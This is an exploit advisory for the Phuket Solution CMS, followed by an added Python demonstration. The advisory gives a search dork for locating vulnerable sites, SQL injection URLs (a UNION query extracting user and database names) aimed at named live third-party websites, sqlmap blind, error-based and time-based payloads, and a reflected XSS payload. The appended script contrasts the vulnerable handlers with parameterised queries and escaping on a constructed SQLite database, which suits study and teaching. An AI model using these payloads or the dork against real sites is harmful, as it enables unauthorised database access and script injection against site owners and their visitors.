#Exploit Title: Phuket Solution CMS SQL Injection and XSS Vulnerabilities
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.phuketsolution.com
#Google Dork: "Powered by Phuket Solution" or "Developed by Phuket Solution" or "Designed & Developed by Phuket Designer"
#Category: webapps
#Tested On: Windows 10, Firefox
#Software Link: https://www.phuketsolution.com/portfolio.html
SQL Injection
Demo: http://henryscollection.com/product.php?products=-748%27%20UNION%20SELECT%201,2,3,4,user(),database(),7--%20-
      (the products value is embedded in a quoted string literal: the leading ' closes it, the seven-column UNION places user() and database() in columns 5 and 6, and "-- -" comments out the rest of the original query)
Demo: http://www.theattitudeclub.com/saturdayscondo/themeweb/news-detail.php?id=75 [SQL Injection Vulnerability]
Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2%27
      (sqlmap run against this endpoint confirmed the property-types parameter as injectable; output below)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: property-types (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: property-types=1 AND 6120=6120&types=2
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: property-types=1 AND (SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9297=9297,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&types=2
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: property-types=1 AND (SELECT 8964 FROM (SELECT(SLEEP(5)))pKeR)&types=2
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
################################################################################
Cross Site Scripting (XSS)
Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%2F%3E%3Cscript%3Ealert%28%22PywebSecurity%22%29%3C%2Fscript%3E%3E
      (the code search parameter is reflected into the page unescaped; the decoded payload "/><script>alert("PywebSecurity")</script>> closes the surrounding attribute and tag before injecting the script element)
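The following is an added example, not code from this advisory or from Phuket Solution. It is a stand-in for the request handling that the SQL injection and XSS findings above imply, written once in the vulnerable shape (query text built by string concatenation, the code value echoed raw into the search form) and once hardened (parameterised queries, integer whitelist, attribute-context escaping). Table names, column names, the product/property rows, the admin_users table and the false half of the boolean pair (6120=6121) are all constructed; the database is in-memory SQLite, so the MySQL-only payloads (FLOOR(RAND) error-based, SLEEP time-based) are not reproduced, and user()/database() in the product.php payload are replaced by sqlite_version() and a subquery on the constructed admin table.

```python
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Demo URLs copied from the advisory.
PROPERTIES_URL = ("https://www.sawasdeephuketproperty.com/properties-list.php?"
                  "property-types=1 AND 6120=6120&types=2")
XSS_URL = ("https://www.sawasdeephuketproperty.com/properties-list.php?"
           "property-types=1&types=2&location=&prices=&bedroom=&code="
           "%22%2F%3E%3Cscript%3Ealert%28%22PywebSecurity%22%29%3C%2Fscript%3E%3E")
# The product.php payload, with user()/database() swapped for sqlite_version()
# and a subquery on a constructed admin table (SQLite has no user()/database()).
UNION_PAYLOAD = ("-748' UNION SELECT 1,2,3,4,sqlite_version(),"
                 "(SELECT pw_hash FROM admin_users),7-- -")


def query_params(url):
    """First value of every query-string parameter, percent-decoded."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def make_db():
    """Constructed schema and rows standing in for the CMS database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE properties (id INTEGER, property_type INTEGER, title TEXT);
        INSERT INTO properties VALUES (1, 1, 'Villa A'), (2, 1, 'Villa B'),
                                      (3, 2, 'Condo C');
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, stock INTEGER,
                               description TEXT, image TEXT, category TEXT,
                               code TEXT);
        INSERT INTO products VALUES (748, 'Lamp', 19.5, 3, 'Desk lamp',
                                     'lamp.jpg', 'home', '748');
        CREATE TABLE admin_users (id INTEGER, login TEXT, pw_hash TEXT);
        INSERT INTO admin_users VALUES (1, 'admin', 'deadbeef');
    """)
    return con


# --- vulnerable handlers: the GET value becomes part of the SQL text --------
def vulnerable_properties(con, ptype):
    # Numeric context, no quotes: "1 AND 6120=6120" is accepted as SQL.
    sql = "SELECT id, title FROM properties WHERE property_type = " + ptype
    return con.execute(sql).fetchall()


def vulnerable_product(con, code):
    # String context: the leading quote closes the literal, "-- -" comments
    # out the trailing one, and the seven-column UNION is appended.
    sql = ("SELECT id, name, price, stock, description, image, category "
           "FROM products WHERE code = '" + code + "'")
    return con.execute(sql).fetchall()


def vulnerable_form(code):
    # The search value is reflected unescaped inside a quoted attribute.
    return '<input type="text" name="code" value="' + code + '">'


# --- hardened handlers: data stays data ------------------------------------
def hardened_properties(con, ptype):
    if not ptype.isdigit():   # the parameter is an integer id; reject anything else
        return []             # a real handler would answer 400 here
    sql = "SELECT id, title FROM properties WHERE property_type = ?"
    return con.execute(sql, (int(ptype),)).fetchall()


def hardened_product(con, code):
    sql = ("SELECT id, name, price, stock, description, image, category "
           "FROM products WHERE code = ?")
    return con.execute(sql, (code,)).fetchall()


def hardened_form(code):
    # quote=True also encodes the double quote, so the attribute cannot be closed.
    escaped = html.escape(code, quote=True)
    return '<input type="text" name="code" value="' + escaped + '">'


def boolean_blind_differs(handler, con, true_value, false_value):
    """sqlmap's boolean-based inference reduced to one comparison: the
    parameter is injectable when a true and a false condition return
    different result sets."""
    return handler(con, true_value) != handler(con, false_value)


if __name__ == "__main__":
    con = make_db()
    ptype = query_params(PROPERTIES_URL)["property-types"]   # '1 AND 6120=6120'
    false_ptype = ptype.replace("6120=6120", "6120=6121")    # constructed false half
    print("vulnerable injectable:", boolean_blind_differs(vulnerable_properties, con, ptype, false_ptype))
    print("hardened injectable:  ", boolean_blind_differs(hardened_properties, con, ptype, false_ptype))
    print("UNION leak:", vulnerable_product(con, UNION_PAYLOAD))
    print("UNION against hardened:", hardened_product(con, UNION_PAYLOAD))
    xss = query_params(XSS_URL)["code"]
    print(vulnerable_form(xss))
    print(hardened_form(xss))
```

Running the script shows the boolean pair producing different row sets only against the vulnerable handler, the UNION payload returning a row whose columns 5 and 6 carry sqlite_version() and the admin hash only against the vulnerable handler, and the escaped form containing no script element. The integer whitelist on property-types matters as much as the placeholder: a placeholder alone would still let arbitrary text reach the query as a bound value, which is safe, but rejecting non-numeric input also keeps the endpoint's error behaviour from being a side channel.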
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************